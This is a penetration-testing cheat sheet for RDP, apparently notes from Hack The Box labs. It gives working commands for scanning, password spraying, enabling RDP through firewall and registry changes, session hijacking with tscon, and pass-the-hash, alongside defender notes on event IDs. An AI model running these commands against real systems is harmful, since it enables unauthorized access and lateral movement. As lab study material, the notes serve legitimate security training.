[3389] Remote Desktop Protocol (RDP)

# We can connect to RDP servers from Linux using xfreerdp, rdesktop, or Remmina.

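# Footprinting
# Note: quote the script glob (--script "rdp*"); unquoted, the shell expands it against any matching file in the current directory (e.g. rdp-sec-check.pl) before nmap sees it.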
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

# RDP Security Check
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
Intrusionz3r0X@htb[/htb]$ rdp-sec-check.pl 10.0.0.94

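# Brute force
# Both commands below try one password against a list of users (password spraying). Repeated failures can trigger account lockout and show up as failed logons (Event ID 4625) on the target.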
Intrusionz3r0X@htb[/htb]$ crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Intrusionz3r0X@htb[/htb]# hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

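# Enable RDP
# Adds Windows Firewall rules for TCP 3389 and sets fDenyTSConnections to 0. Defenders: unexpected changes to this value or new 3389 firewall rules are worth alerting on.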
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=out localport=3389 action=allow
c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

#---------Session Hijacking-------- 
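#(This method no longer works on Server 2019.)
# The service created below runs tscon as SYSTEM, so creating it requires local administrator rights; the new service is recorded as Event ID 7045 in the System log.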
C:\htb> query user

# USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
#>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
# lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM

C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
#[SC] CreateService SUCCESS
C:\htb> net start sessionhijack
#-------------------------------------

# Initiate an RDP Session
# Note: a password passed with /p: ends up in shell history and is visible in the process list.
Intrusionz3r0X@htb[/htb]$ xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248

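# RDP Pass-the-Hash (PtH)
# Setting DisableRestrictedAdmin to 0 enables Restricted Admin mode, which PtH over RDP depends on. Defenders: monitor this value under the Lsa key for unexpected changes.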
C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Enable RDP via CrackMapExec
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.10.40 -u "Administrator" -H 'cdf51b162460b7d5bc898f493751a0cc' -M rdp -o action=enable